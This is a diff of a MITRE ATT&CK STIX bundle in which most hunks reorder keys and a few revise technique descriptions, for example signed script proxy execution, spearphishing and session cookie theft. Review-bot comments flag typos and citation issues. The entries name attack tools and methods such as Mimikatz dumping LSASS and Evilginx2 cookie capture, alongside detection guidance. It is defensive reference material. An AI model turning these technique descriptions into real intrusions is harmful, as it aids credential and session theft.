- "x_mitre_detection": "Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.\n\nMonitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.",
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.1"
},
{
"id": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Signed Script Proxy Execution",
- "description": "Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)",
+ "description": "Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -24577,28 +25470,28 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T19:39:37.336Z",
+ "modified": "2020-06-20T22:39:47.559Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
- "x_mitre_data_sources": [
- "Process monitoring",
- "Process command-line parameters"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.",
+ "x_mitre_defense_bypassed": [
+ "Application control",
+ "Digital Certificate Validation"
],
"x_mitre_contributors": [
"Praetorian"
],
- "x_mitre_defense_bypassed": [
- "Application whitelisting",
- "Digital Certificate Validation"
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "Process command-line parameters"
],
- "x_mitre_detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -24639,18 +25532,18 @@
],
"modified": "2020-03-25T21:46:46.831Z",
"created": "2020-02-11T19:14:48.309Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) \n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.",
- "x_mitre_permissions_required": [
- "User"
- ],
"x_mitre_data_sources": [
"Authentication logs",
"Windows event logs"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) \n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -24681,21 +25574,8 @@
],
"modified": "2020-02-21T16:31:32.789Z",
"created": "2017-05-31T21:30:57.201Z",
- "x_mitre_contributors": [
- "Shane Tully, @securitygypsy"
- ],
- "x_mitre_remote_support": true,
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_detection": "Detection methods will vary depending on the type of third-party software or system and how it is typically used. \n\nThe same investigation process can be applied here as with other potentially malicious activities where the distribution vector is initially unknown but the resulting activity follows a discernible pattern. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems. \n\nOften these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Ensure that third-party application logs are on-boarded to the enterprise logging system and the logs are regularly reviewed. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious. Monitor account login activity on these applications to detect suspicious/abnormal usage.\n\nPerform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "2.0",
"x_mitre_data_sources": [
"Authentication logs",
"File monitoring",
@@ -24705,8 +25585,21 @@
"Process use of network",
"Binary file metadata"
],
- "x_mitre_version": "2.0",
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Detection methods will vary depending on the type of third-party software or system and how it is typically used. \n\nThe same investigation process can be applied here as with other potentially malicious activities where the distribution vector is initially unknown but the resulting activity follows a discernible pattern. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems. \n\nOften these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Ensure that third-party application logs are on-boarded to the enterprise logging system and the logs are regularly reviewed. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious. Monitor account login activity on these applications to detect suspicious/abnormal usage.\n\nPerform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.",
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_remote_support": true,
+ "x_mitre_contributors": [
+ "Shane Tully, @securitygypsy"
+ ]
},
{
"external_references": [
@@ -24721,7 +25614,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Software Discovery",
- "description": "Adversaries may attempt to get a listing of software and software versions that are installed on a system. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).",
+ "description": "Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).",
"id": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -24730,8 +25623,23 @@
"phase_name": "discovery"
}
],
- "modified": "2020-03-26T18:56:04.855Z",
+ "modified": "2020-06-29T19:34:39.136Z",
"created": "2019-09-16T17:52:44.147Z",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.1",
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_data_sources": [
+ "Stackdriver logs",
+ "Azure activity logs",
+ "AWS CloudTrail logs",
+ "Process command-line parameters",
+ "Process monitoring",
+ "File monitoring"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -24742,19 +25650,7 @@
"Office 365",
"Azure AD",
"SaaS"
- ],
- "x_mitre_data_sources": [
- "Process command-line parameters",
- "Process monitoring",
- "File monitoring"
- ],
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_version": "1.1",
- "x_mitre_is_subtechnique": false
+ ]
},
{
"id": "attack-pattern--6ff403bc-93e3-48be-8687-e102fdba8c88",
@@ -24787,13 +25683,6 @@
"created": "2017-05-31T21:30:43.472Z"
},
{
- "id": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
- "description": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses. ",
- "name": "Software Packing",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -24816,6 +25705,13 @@
"source_name": "Wikipedia Exe Compression"
}
],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Software Packing",
+ "description": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses. ",
+ "id": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -24873,23 +25769,23 @@
],
"modified": "2020-03-30T13:40:14.512Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "2.0",
+ "x_mitre_deprecated": true,
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_remote_support": false,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ],
+ "x_mitre_detection": "Monitor for command shell execution of source and subsequent processes that are started as a result of being executed by a source command. Adversaries must also drop a file to disk in order to execute it with source, and these files can also detected by file monitoring.",
"x_mitre_data_sources": [
"Process monitoring",
"File monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "Monitor for command shell execution of source and subsequent processes that are started as a result of being executed by a source command. Adversaries must also drop a file to disk in order to execute it with source, and these files can also detected by file monitoring.",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_remote_support": false,
- "x_mitre_is_subtechnique": false,
- "x_mitre_deprecated": true
+ "x_mitre_version": "2.0"
},
{
"id": "attack-pattern--e2907cea-4b43-4ed7-a570-0fdf0fbeea00",
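Review bot: The moved `x_mitre_detection` value on the new side still reads "these files can also detected by file monitoring"; since the line is rewritten anyway, fix it to `... and these files can also be detected by file monitoring.` This object carries `x_mitre_deprecated: true`, so it is low priority, but the text is what downstream tooling renders. More broadly, nearly every hunk in this file is a pure key reorder with no semantic change; having whatever generator writes this bundle emit keys in a stable order (sorted, or the order of the upstream STIX source) would keep future diffs limited to real content edits.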
@@ -24950,23 +25846,23 @@
],
"modified": "2020-03-29T20:26:01.690Z",
"created": "2020-02-10T20:47:10.082Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_detection": "It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process monitoring"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
],
"x_mitre_contributors": [
"Erye Hernandez, Palo Alto Networks"
],
- "x_mitre_platforms": [
- "Linux",
- "macOS"
- ]
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring"
+ ],
+ "x_mitre_detection": "It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
@@ -25017,11 +25913,9 @@
],
"modified": "2020-03-27T23:56:40.369Z",
"created": "2020-03-02T19:05:18.137Z",
- "x_mitre_platforms": [
- "macOS",
- "Windows",
- "Linux"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.",
"x_mitre_data_sources": [
"File monitoring",
"Packet capture",
@@ -25030,9 +25924,11 @@
"Email gateway",
"Mail server"
],
- "x_mitre_detection": "Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS",
+ "Windows",
+ "Linux"
+ ]
},
{
"id": "attack-pattern--20138b9d-1aac-4a26-8654-a36b6bbf2bba",
@@ -25060,6 +25956,22 @@
"created": "2018-04-18T17:59:24.739Z"
},
{
+ "created": "2020-03-02T19:15:44.182Z",
+ "modified": "2020-03-02T19:44:47.843Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "initial-access"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
+ "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)",
+ "name": "Spearphishing Link",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -25077,22 +25989,6 @@
"description": "Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Spearphishing Link",
- "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)",
- "id": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "initial-access"
- }
- ],
- "modified": "2020-03-02T19:44:47.843Z",
- "created": "2020-03-02T19:15:44.182Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -25168,18 +26064,18 @@
],
"modified": "2020-03-28T00:04:46.264Z",
"created": "2020-03-02T19:24:00.951Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_detection": "Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. \n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"SSL/TLS inspection",
"Anti-virus",
"Web proxy"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. \n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.",
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
@@ -25256,23 +26152,23 @@
],
"modified": "2020-03-14T23:36:52.095Z",
"created": "2020-03-14T23:36:52.095Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Packet capture",
"Process use of network",
"Process monitoring",
"Network protocol analysis"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -25337,19 +26233,19 @@
],
"modified": "2020-03-24T23:47:39.124Z",
"created": "2020-01-15T18:00:33.603Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "Administrator"
+ "x_mitre_platforms": [
+ "macOS"
],
- "x_mitre_detection": "The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.\n\nMonitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.",
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring"
],
- "x_mitre_platforms": [
- "macOS"
- ]
+ "x_mitre_detection": "The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.\n\nMonitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.",
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--890c9858-598c-401d-a4d5-c67ebcdd703a",
@@ -25408,34 +26304,35 @@
"phase_name": "credential-access"
}
],
- "modified": "2020-03-23T15:59:40.522Z",
+ "modified": "2020-07-14T19:16:30.906Z",
"created": "2019-09-04T15:54:25.684Z",
- "x_mitre_data_sources": [
- "Azure activity logs",
- "OAuth audit logs"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a \u201cHigh severity app permissions\u201d policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.\n\nSecurity analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app\u2019s purpose, or apps with old \u201cLast authorized\u201d fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.\n\nAdministrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.",
+ "x_mitre_platforms": [
+ "SaaS",
+ "Office 365",
+ "Azure AD"
],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_version": "1.0",
"x_mitre_contributors": [
"Shailesh Tiwary (Indian Army)",
"Mark Wee",
"Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)",
"Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)"
],
- "x_mitre_version": "1.0",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_platforms": [
- "SaaS",
- "Office 365",
- "Azure AD"
- ],
- "x_mitre_detection": "Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a \u201cHigh severity app permissions\u201d policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.\n\nSecurity analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app\u2019s purpose, or apps with old \u201cLast authorized\u201d fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.\n\nAdministrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access."
+ "x_mitre_data_sources": [
+ "Azure activity logs",
+ "OAuth audit logs"
+ ]
},
{
"external_references": [
{
- "external_id": "T1539",
"source_name": "mitre-attack",
+ "external_id": "T1539",
"url": "https://attack.mitre.org/techniques/T1539"
},
{
@@ -25454,9 +26351,9 @@
"description": "Chen, Y., Hu, W., Xu, Z., et. al.. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved October 14, 2019."
},
{
- "source_name": "Github evilginx2",
+ "description": "Gretzky, Kuba. (2019, April 10). Retrieved October 8, 2019.",
"url": "https://github.com/kgretzky/evilginx2",
- "description": "Gretzky, Kuba. (2019, April 10). Retrieved October 8, 2019."
+ "source_name": "Github evilginx2"
},
{
"source_name": "GitHub Mauraena",
@@ -25469,7 +26366,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Steal Web Session Cookie",
- "description": "An adversary may steal web application or service session cookies and use them to gain access web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\n\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)\n\nThere are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Mauraena that can gather session cookies through a man-in-the-middle proxy that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)\n\nAfter an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1506) technique to login to the corresponding web application.",
+ "description": "An adversary may steal web application or service session cookies and use them to gain access web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.\n\nCookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)\n\nThere are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a man-in-the-middle proxy that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)\n\nAfter an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1506) technique to login to the corresponding web application.",
"id": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff",
"type": "attack-pattern",
"kill_chain_phases": [
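Review bot: The corrected description fixes the framework name to "Muraena" in prose but still cites it as `(Citation: GitHub Mauraena)`, and the matching `source_name` a few lines above keeps the misspelling; that is internally consistent today, but if the key is ever corrected both places must change together or the citation will dangle. While this line is being rewritten, also fix `gain access web applications` → `gain access to web applications`, `bypasses some multi-factor` → `bypass some multi-factor`, and `targets machine` → `target's machine`. The trailing link to `techniques/T1506` is worth checking: the Kerberos entry later in this file references a sub-technique ID under T1550 (`T1550/003`), so T1506 may be a pre-sub-technique ID that has since been moved.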
@@ -25478,28 +26375,29 @@
"phase_name": "credential-access"
}
],
- "modified": "2019-10-22T19:59:20.282Z",
+ "modified": "2020-04-21T15:26:25.584Z",
"created": "2019-10-08T20:04:35.508Z",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.",
